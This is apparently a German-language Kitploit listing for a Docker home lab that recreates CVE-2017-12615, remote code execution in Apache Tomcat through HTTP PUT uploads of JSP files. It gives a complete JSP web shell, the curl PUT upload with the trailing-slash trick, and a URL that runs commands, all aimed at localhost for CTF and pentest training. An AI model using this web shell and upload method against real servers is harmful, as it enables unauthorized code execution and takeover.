Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2017-12615-Home-Lab — CVE-2017-12615 Tomcat: Remote-Code-Ausführung über JSP-Upload Heimlabor für Red Teaming, Penetrationstests | Kitploit
Tools/GitHubGitHub/netw0rk7/cve-2017-12615-home-lab
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & BildungRed TeamingLabs & Praxis
GitHubnetw0rk7/cve-2017-12615-home-lab

CVE-2017-12615-Home-Lab

CVE-2017-12615 Tomcat: Remote-Code-Ausführung über JSP-Upload Heimlabor für Red Teaming, Penetrationstests

Repository anzeigen
1vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2017-12615 Tomcat: Remote-Code-Ausführung durch JSP-Upload

image

Dieses Labor simuliert die Schwachstelle CVE-2017-12615 Tomcat: Remote Code Execution via JSP Upload
Sie entsteht durch die Einstellung readonly=false, die das Hochladen von Dateien über HTTP PUT ermöglicht, einschließlich .jsp-Dateien, die Befehle ausführen können (RCE).


image

Funktionen

  • Apache Tomcat 7.0.79 (anfällig)
  • Verwendet DefaultServlet-Override mit readonly=false
  • Ermöglicht PUT-Upload zum Ablegen von .jsp-Dateien im ROOT-Webverzeichnis
  • Unterstützt die Ausführung von Befehlen über eine Web-Shell
  • Industrial-Webseite mit einem vergessenen internen Hinweis (Hint)
  • Automatische Generierung von bei jedem Containerstart
flag_RANDOM.txt
  • Entwickelt für CTF / Red Team / Pentest Training

  • Verzeichnisstruktur

    root@kitploit:~
    /opt/apache-tomcat-7.0.79/
    /opt/apache-tomcat-7.0.79/webapps/ROOT/index.jsp
    /opt/apache-tomcat-7.0.79/webapps/ROOT/WEB-INF/web.xml
    /tmp/flag_RANDOM.txt
    /docker-entrypoint.sh
    

    Verwendung (Container starten)

    root@kitploit:~
    docker compose build
    docker compose up -d
    

    Webseite öffnen:

    root@kitploit:~
    http://localhost:8080/
    

    Testen der Schwachstelle CVE-2017-12615

    1) JSP-Payload-Datei erstellen

    root@kitploit:~
    cat > shell.jsp << 'EOF'
    <%@ page import="java.io.*" %>
    <%
    String cmd = request.getParameter("cmd");
    if (cmd != null) {
        String s;
        Process p = Runtime.getRuntime().exec(cmd);
        BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
        while ((s = r.readLine()) != null) out.println(s + "<br>");
    }
    %>
    EOF
    

    2) Datei mit PUT hochladen (erfordert / am Ende des Dateinamens)

    root@kitploit:~
    curl -v -X PUT "http://localhost:8080/shell.jsp/"   -H "Content-Type: text/plain"   --data-binary @shell.jsp
    

    3) Webshell aufrufen

    root@kitploit:~
    http://localhost:8080/shell.jsp?cmd=id
    

    Flag

    Gespeichert in:

    root@kitploit:~
    /tmp/flag_RANDOM.txt
    

    Englische Version — CVE-2017-12615 Tomcat: Remote Code Execution via JSP Upload

    Dieses Labor simuliert CVE-2017-12615 Tomcat: Remote Code Execution via JSP Upload, bei dem der DefaultServlet von Apache Tomcat falsch konfiguriert ist mit:

    root@kitploit:~
    readonly=false
    

    Dies ermöglicht Angreifern, .jsp-Dateien über HTTP PUT hochzuladen, was eine Remote-Code-Ausführung ermöglicht.


    image

    Funktionen

    • Anfälliger Apache Tomcat 7.0.79
    • DefaultServlet-Override mit readonly=false
    • PUT-Upload → beliebige .jsp-Dateien in das ROOT-Webverzeichnis schreiben
    • Unterstützt Befehlsausführung über die JSP-Shell
    • Industrial-Startseite mit einem dezenten internen Hinweis
    • Automatisch generierte flag_RANDOM.txt beim Containerstart
    • Geeignet für CTF, Forschung und Exploit-Entwicklung

    Ausnutzungsbeispiel

    Hochladen einer JSP-Shell

    root@kitploit:~
    curl -v -X PUT "http://localhost:8080/shell.jsp/"   -H "Content-Type: text/plain"   --data-binary @shell.jsp
    

    Befehle ausführen

    root@kitploit:~
    http://localhost:8080/shell.jsp?cmd=id
    

    Flag-Speicherort

    root@kitploit:~
    /tmp/flag_RANDOM.txt
    

    Haftungsausschluss

    Nur zu Bildungs-, Forschungs- und autorisierten Penetrationstests.

    Tool herunterladen